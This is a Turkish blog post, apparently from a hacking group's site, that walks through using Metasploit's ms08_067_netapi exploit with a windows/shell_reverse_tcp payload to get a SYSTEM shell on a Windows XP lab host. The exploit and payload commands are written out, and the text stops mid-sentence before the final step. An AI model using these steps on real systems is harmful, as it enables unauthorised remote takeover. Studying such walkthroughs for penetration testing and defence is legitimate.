Tarih : | at : | Safemode : ON
> root@redhatz:~# Alımlar Başlamıştır. İletişim Bölümünden Alım Yapan Yöneticimize Ulaşabilirsiniz.
> root@redhatz:~# #redhatzopturkey 2016 Yeni Dönemi Artık Aktiftir. BİZİ TERCİH ETTİĞİNİZ İÇİN TEŞEKKÜRLER..



Başlık Yazar Yetki Comt Düzenlenen Kategori

/ BackTrack5 ile Windows XP-SP3 Sızma (Hacking) / Web & Server Güvenliği WyNe rwxr-xr-x 0 17:53:00

Başlık / BackTrack5 ile Windows XP-SP3 Sızma (Hacking) / Web & Server Güvenliği
Yetki rw-r--r--
Yazar WyNe
Zaman 17:53:00
Kategori
Share

BackTrack 5 kullanarak Windows XP işletim sistemi üzerinde penetration (sızma) test yapmak isteyen bilişim profesyonelleri için, BackTrack alt yapısı kullanarak Windows XP SP3, SP2, SP1 işletim sistemlerine sızma işleminin nasıl yapılacağını inceleyelim.
Makalenin Ön Gereksinimleri:
1-) http://www.eyupcelik.com.tr/ceh/vmwa...ulumuAdresinde bulunan VMware Üzerine Back Track 5 Kurulumu makalemi okumuş olması veya VMware üzerinde sanal işletim sistemi kurabilecek düzeyde olmak gerekmektedir.
2-) Nmap (Zenmap) ile footprinting (Bilgi Toplama) evresini bilmek.
VMware’de bulunan BackTrack 5 işletim sistemini açarak login oluyoruz. Application\Exploitation Tools\Network Exploitation Tools\****sploit Framework menüsünden msfupdate’i çalıştırıyoruz. ****Sploit Framework’ün güncel exploitleri indirmesini bekliyoruz. Ardından Application\Exploitation Tools\Network Exploitation Tools\****sploit Framework menüsünden msfconsole’u çalıştırıyoruz.




Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Yukarıdaki gibi konsol ekranı geldikten sonra show exploits komutu ile ****Sploit platformunda kullanıma hazır exploitleri görüntülüyoruz. Windows XP SP3 işletim sistemlerinde bulunan dosya ve yazıcı paylaşımı(SMB)’ndaki bir zafiyetten dolayı sistem yetkilerini ele geçiren bir exploit mevcut. ms08_067_netapi adındaki bu exploiti kullanarak hedef sisteme sızmaya çalışacağız. Bu exploiti hedef sistem üzerinde çalıştırdıktan sonra hedef sistemi ele geçirmek için bir payloads’a ihtiyacımız olacaktır. Hedef sistemde SYSTEM yetkileri ile bulunan cmd ekranını shell_reverse_tcp payloads’ı ile ters bağlantı mantığını kullanarak ekrana getireceğiz. Böylece sisteme sızmış olacağız. MsfConsole ekranından use windows/smb/ms08_067_netapi komutunu giriyoruz.



Konsol çıktısı yukarıdaki gibi olduktan sonra exploiti hedef sistem üzerine test etmek için 192.168.27.50 ip adresine sahip hedef ip adresini exploit üzerinde yapılandırmamız gerekecek. Bunun için öncelikle show options komutunu girip exploitin düzenlenmesi gereken kısımlarına göz atacağız.

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Yukarıdaki resme dikkat edecek olursak RHOST yanından bulunan Current Setting kısmı boş ve hemen yanında Required (Gerekli) kısmı yes olarak belirlenmiş durumda. Bu şu demek; bu exploiti çalıştırmak için RHOST kısmını mutlaka girmek zorundayız. Bunun için set RHOST 192.168.27.50 komutunu giriyoruz.



Komut çıktımız yukarıdaki gibi olacaktır. Daha sonra kullanacağımız Payloads’ı seçmek için show payloads komutunu kullanıyoruz. Hedef sistemin komut ekranını getirmesi için shell_reverse_tcp payloads’ını kullanacağız. Dolayısı ile konsol ekranına gireceğimiz komut set payloads windows/shell_reverse_tcp komutu olacaktır.

Bu resim yeniden boyutlandırılmıştır, tam halini görmek için tıklayınız.


Yukarıdaki gibi komutumuzu da verdikten sonra, son bir kez show options komutu ile hedef sistem üzerinde çalışacak olan exploitimizi inceliyoruz. Tüm bunları yaptıktan sonra exploit komutu ile exploitimizi derleyip hedef sistem üzerinde

0 yorum:

Yorum Gönder

Makalemizi Okuduysanız Yorum yapabilirsiniz. Küfürlü Yorumlar Silinir Ve Kullanıcı Engellenir. İlginiz İçin Teşekkür Ederiz
#RedHatzOpTurkey

Blogger tarafından desteklenmektedir.